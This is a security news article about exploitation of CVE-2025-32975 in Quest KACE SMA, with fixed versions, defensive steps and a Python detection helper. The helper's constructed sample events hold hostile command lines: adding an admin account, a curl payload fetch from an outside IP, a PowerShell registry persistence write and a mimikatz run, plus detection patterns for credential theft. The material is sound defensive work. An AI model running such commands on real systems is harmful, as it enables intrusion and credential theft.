Hackers target unpatched Quest KACE SMA systems through critical CVE-2025-32975 flaw


Threat actors are now targeting unpatched Quest KACE Systems Management Appliance, or SMA, systems by abusing CVE-2025-32975, a critical authentication bypass flaw with a CVSS score of 10.0. Arctic Wolf said it observed malicious activity starting the week of March 9, 2026, in customer environments, and the activity matched exploitation of internet-exposed SMA instances that had not received Quest’s fix.

The bug allows attackers to impersonate legitimate users without valid credentials and can lead to full administrative takeover. Quest patched the issue in May 2025, but the latest findings suggest that organizations that left SMA appliances exposed and unpatched still face a serious risk.

Arctic Wolf said the attackers appear to have used the flaw to seize administrative control, run remote commands, and pull Base64-encoded payloads from an external server using curl. The company added that it has not yet confirmed the attackers’ final objective.

What happened

Quest KACE SMA is an on-premises endpoint management platform used for inventory, software deployment, patching, and monitoring. According to Arctic Wolf, the recent activity affected unpatched SMA systems that were publicly exposed to the internet.

The issue itself is tied to the product’s SSO authentication handling. NVD describes CVE-2025-32975 as an authentication bypass vulnerability that can let attackers impersonate valid users and take over administrative accounts.

What attackers reportedly did after gaining access

After the initial compromise, Arctic Wolf said the attackers created additional admin accounts through runkbot.exe, a background process tied to the SMA Agent that runs scripts and manages installations. The company also observed Windows Registry changes through PowerShell, which may point to persistence or follow-on system changes.

Arctic Wolf’s observed post-compromise activity included:

  • Credential harvesting with Mimikatz
  • Reconnaissance on logged-in users and administrator groups
  • Use of commands such as net time and net group
  • Access attempts involving backup infrastructure, including Veeam and Veritas
  • Movement toward domain controllers through RDP access

Affected and fixed versions

Quest said the vulnerabilities were resolved in the following KACE SMA versions:

Branch    Fixed version
13.0.x    13.0.385
13.1.x    13.1.81
13.2.x    13.2.183
14.0.x    14.0.341 (Patch 5)
14.1.x    14.1.101 (Patch 4)

NVD lists the same affected version ranges and confirms that builds earlier than those releases remain vulnerable.

Why this matters

A CVSS 10.0 score marks this as a maximum-severity issue, and the latest threat activity raises the stakes further because it moves the flaw from a patching bulletin into a live intrusion risk. Publicly exposed management appliances already make attractive targets because they often sit close to administrative workflows, scripts, endpoints, and credentials.

This also means defenders should treat unpatched SMA exposure as an urgent incident-response matter, not just a routine update backlog item. If an appliance remained internet-facing and below the fixed versions, teams should assume compromise is possible and investigate for new admin accounts, suspicious script execution, unexpected outbound connections, registry changes, and credential theft tools. The investigative steps in the preceding sentence are an inference from Arctic Wolf’s observed tradecraft and the vulnerability’s impact.

What admins should do now

Quest recommends updating to a secure version, and Arctic Wolf said organizations should avoid exposing SMA instances directly to the internet.

Priority steps:

  • Patch KACE SMA to a fixed version immediately
  • Remove direct internet exposure where possible
  • Review admin accounts for any unauthorized additions
  • Check for curl activity tied to unusual external infrastructure
  • Investigate runkbot.exe use outside expected workflows
  • Hunt for PowerShell-based registry changes
  • Look for Mimikatz artifacts and lateral movement toward backup servers or domain controllers
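The following is an added triage helper that ties together the version table above and the hunting steps in this list. It is example code written for this article, not Quest’s or Arctic Wolf’s tooling. It does two things: it decides whether a reported KACE SMA build is at or above the fixed build for its branch, using the fixed versions Quest published, and it flags constructed, simplified process-creation records for the post-compromise indicators the article describes (runkbot.exe launching account changes or reconnaissance commands, curl fetching from hosts outside an allowlist, PowerShell registry writes, and Mimikatz). The record field names, the install path for runkbot.exe, the allowlisted hosts, and every sample line are constructed for illustration and are not taken from a real log format or a real incident.

```python
"""Added triage helper for the CVE-2025-32975 guidance (example code, not
Quest's or Arctic Wolf's). Field names, paths, hosts and sample events are
constructed for illustration only."""
import re

# Fixed builds per supported branch, from Quest's advisory as quoted in the article.
FIXED_BUILDS = {
    "13.0": (13, 0, 385),
    "13.1": (13, 1, 81),
    "13.2": (13, 2, 183),
    "14.0": (14, 0, 341),
    "14.1": (14, 1, 101),
}

# Constructed allowlist of internal hosts the SMA agent is expected to download from.
ALLOWED_DOWNLOAD_HOSTS = {"kace.example.internal", "updates.example.internal"}


def parse_version(version: str) -> tuple:
    """Parse 'major.minor.build', tolerating a trailing ' (Patch N)' suffix."""
    m = re.match(r"\s*(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised KACE SMA version string: {version!r}")
    return tuple(int(g) for g in m.groups())


def sma_version_status(version: str) -> str:
    """Return 'fixed', 'vulnerable' or 'unknown-branch' for an SMA build string."""
    major, minor, build = parse_version(version)
    fixed = FIXED_BUILDS.get(f"{major}.{minor}")
    if fixed is None:
        return "unknown-branch"  # branch not in Quest's table; check the vendor advisory
    return "fixed" if (major, minor, build) >= fixed else "vulnerable"


# Indicator patterns derived from the behaviours listed in the article.
RE_ACCOUNT_ADD = re.compile(r"\bnet(?:1)?\s+(user|localgroup)\b.*\s/add\b", re.IGNORECASE)
RE_RECON = re.compile(r"\bnet(?:1)?\s+(time|group)\b", re.IGNORECASE)
RE_CURL = re.compile(r"\bcurl(?:\.exe)?\b", re.IGNORECASE)
RE_URL_HOST = re.compile(r"https?://([^/\s:\"']+)", re.IGNORECASE)
RE_REG_WRITE = re.compile(r"(set-itemproperty|new-itemproperty|reg(?:\.exe)?\s+add|HKLM|HKCU)", re.IGNORECASE)
RE_CRED_TOOL = re.compile(r"(mimikatz|sekurlsa::|lsadump::)", re.IGNORECASE)


def triage_event(event: dict) -> list:
    """Return the indicator names that a single process-creation record matches."""
    parent = event.get("parent", "").lower()
    cmd = event.get("cmdline", "")
    findings = []
    from_runkbot = parent.endswith("runkbot.exe")
    if from_runkbot and RE_ACCOUNT_ADD.search(cmd):
        findings.append("account-creation-via-runkbot")
    if from_runkbot and RE_RECON.search(cmd):
        findings.append("recon-via-runkbot")
    if RE_CURL.search(cmd):
        # Flag curl only when it pulls from a host outside the constructed allowlist.
        if any(h.lower() not in ALLOWED_DOWNLOAD_HOSTS for h in RE_URL_HOST.findall(cmd)):
            findings.append("curl-to-unusual-host")
    if "powershell" in f"{parent} {cmd}".lower() and RE_REG_WRITE.search(cmd):
        findings.append("powershell-registry-change")
    if RE_CRED_TOOL.search(cmd):
        findings.append("credential-theft-tool")
    return findings


def triage_events(events) -> list:
    """Return (event index, indicator) pairs for every match across a batch of records."""
    return [(i, f) for i, e in enumerate(events) for f in triage_event(e)]


# Constructed sample records: parent image and child command line (not a real log format).
RUNKBOT = r"C:\Program Files (x86)\Quest\KACE\runkbot.exe"  # placeholder install path
SAMPLE_EVENTS = [
    {"parent": RUNKBOT, "cmdline": "net user helpdesk2 /add"},
    {"parent": RUNKBOT, "cmdline": "net localgroup Administrators helpdesk2 /add"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"curl.exe -s http://203.0.113.45/a.b64 -o C:\Windows\Temp\a.b64"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "curl.exe -s https://updates.example.internal/agent.msi -o agent.msi"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoP -Command "Set-ItemProperty -Path HKLM:\Software\Example -Name Updater -Value C:\Windows\Temp\u.exe"'},
    {"parent": RUNKBOT, "cmdline": 'net group "Domain Admins" /domain'},
    {"parent": r"C:\Windows\System32\cmd.exe", "cmdline": r"C:\Windows\Temp\mimikatz.exe"},
]

if __name__ == "__main__":
    for v in ("13.2.182", "13.2.183", "14.0.341 (Patch 5)", "12.1.50"):
        print(v, "->", sma_version_status(v))
    for idx, indicator in triage_events(SAMPLE_EVENTS):
        print(f"event {idx}: {indicator}: {SAMPLE_EVENTS[idx]['cmdline']}")
```

The version check compares the full (major, minor, build) tuple against the fixed build for the same branch, so a build from a branch Quest did not list comes back as unknown rather than silently passing. The event rules deliberately key the account-creation and reconnaissance checks to runkbot.exe as the parent, since that is the process the article ties to the observed admin-account creation; the same `net user /add` from an ordinary admin shell is not flagged by this rule and would need its own baseline.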

FAQ

What is CVE-2025-32975?

It is a critical authentication bypass flaw in Quest KACE SMA that can let attackers impersonate valid users and fully take over admin accounts.

Has this vulnerability been patched?

Yes. Quest patched it in May 2025 and published fixed versions for supported release branches.

Are attackers exploiting it now?

Arctic Wolf said it observed malicious activity in March 2026 that is consistent with exploitation of CVE-2025-32975 on unpatched, internet-exposed SMA systems.

Which systems are most at risk?

Unpatched SMA appliances that remain publicly exposed to the internet face the highest risk based on Arctic Wolf’s findings.
